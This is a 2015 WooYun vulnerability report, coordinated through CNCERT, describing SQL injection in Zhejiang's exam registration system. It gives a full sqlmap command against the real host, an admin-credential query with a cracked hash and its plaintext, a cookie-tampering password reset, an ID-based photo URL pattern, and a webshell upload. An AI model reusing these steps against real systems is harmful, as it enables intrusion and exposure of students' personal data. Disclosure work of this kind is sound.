当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100573

漏洞标题:看我如何攻破浙江招考系统(几十万考生信息一览无余)

相关厂商:浙江省教育考试院

漏洞作者: GreenVine

提交时间:2015-03-11 13:46

修复时间:2015-04-25 13:46

公开时间:2015-04-25 13:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-11: 细节已通知厂商并且等待厂商处理中
2015-03-16: 厂商已经确认,细节仅向厂商公开
2015-03-26: 细节向核心白帽子及相关领域专家公开
2015-04-05: 细节向普通白帽子公开
2015-04-15: 细节向实习白帽子公开
2015-04-25: 细节向公众公开

简要描述:

浙江招考系统的某处存在注入,考生照片、住址、电话等信息一览无余,且可Getshell。

详细说明:

之前听某童鞋说浙江省高校招生考试报名系统存在SQL注入,闲着无聊就试了一下。
登录页:http://pgzy.zjzs.net:8011/login.htm

login_sql_injection.jpg


Oracle Error里面直接爆出了查询语句,空格做了过滤,用Tab绕过。测试发现or 1=1可用,但对登录IP做了限制,直接上SQLMap:

sqlmap.py -u "http://pgzy.zjzs.net:8011/ashx/ajaxHandler.ashx?shenfenzheng=1&mima=1&yzm=1111&isadmin=true&title=login" -f --banner --dbs --users --cookie "CheckCode=1111" --drop-set-cookie --eval="shenfenzheng=shenfenzheng.replace(' ','%09')" --prefix "')" --suffix "AND ('1'='1"


扫出结果:

sqlmap_users.jpg


sqlmap_database.jpg


然后查管理员:

SELECT MEM_NO,LOGINIP,MEM_PASSWORD FROM BAS_MEMBER


sqlmap_login.jpg


爆出两个没有登陆IP限制的,074e19227f1f878c893c80c4161104ad解得907523。

admin_portal_menu.jpg


登进去发现权限好大,菜单里找到一个管理员密码初始化,改Cookie为admin后成功初始化了密码:

admin_cookie.jpg


信息一览无余:

admin_info_1.jpg


admin_info_2.jpg


顺带发现照片接口没有做限制,且可通过身份证暴力破解:

http://pgzy.zjzs.net:8011/xnml/pic/savepic/33/01/04/1997/11/33010419971129XXXX.jpg (XXXX为身份证后四位)


admin_info_3.jpg


开始上传考生照片咯,zip传上去后顺着Ajax返回信息找到了临时目录:

http://pgzy.zjzs.net:8011/xnml/pic/temppic/


admin_upload_shell.jpg


随便写点东西:

webshell.jpg


菜刀:

chopper_file.jpg


PS: Tasklist的时候发现了个奇怪的东东,你们比我懂:

chopper_tasklist.jpg

漏洞证明:

login_sql_injection.jpg


sqlmap_login.jpg


admin_cookie.jpg


admin_upload_shell.jpg


chopper_file.jpg

修复方案:

1. SQL过滤要认真
2. 敏感信息不用Cookie存储会死?
3. 照片神马的直接用身份证命名真的好吗?

版权声明:转载请注明来源 GreenVine@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-03-16 08:25

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置。

最新状态:

暂无